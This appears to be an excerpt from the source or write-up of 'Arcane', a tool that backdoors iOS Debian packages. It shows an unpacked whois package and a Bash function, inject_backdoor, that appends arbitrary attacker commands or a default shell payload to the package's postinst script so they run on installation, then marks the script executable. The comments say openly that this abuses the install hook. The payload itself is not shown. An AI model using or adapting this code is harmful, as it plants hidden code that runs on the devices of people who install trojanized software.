Arcane: backdoor iOS packages (iphone-arm)

tree /tmp/whois-decomp/



/tmp/whois-decomp/

├── DEBIAN

│   ├── control

│   └── postinst

└── usr

    └── bin

        └── whois

# The "post-installation" file. This file is generally responsible

# for executing commands on the OS after installing the required

# files. It's utilized by developers to manage and maintain various

# aspects of an installation. Arcane abuses this functionality by

# appending malicious Bash commands to the file.

postinst="$tmp/DEBIAN/postinst";



# A function to handle the type of command execution embedded into the

# postinst file.

function inject_backdoor ()

{

    # If --file is used, `cat` the command(s) into the postinst file.

    if [[ "$infile" ]]; then

        cat "$infile" >> "$postinst";

        embed="[$infile]";

    else

        # If no --file, utilize the simple Bash payload, previously

        # defined.

        echo -e "$payload" >> "$postinst";

        embed="generic shell command";

    fi;

    status "embedded $embed into postinst" "error embedding backdoor";

    chmod 0755 "$postinst"

};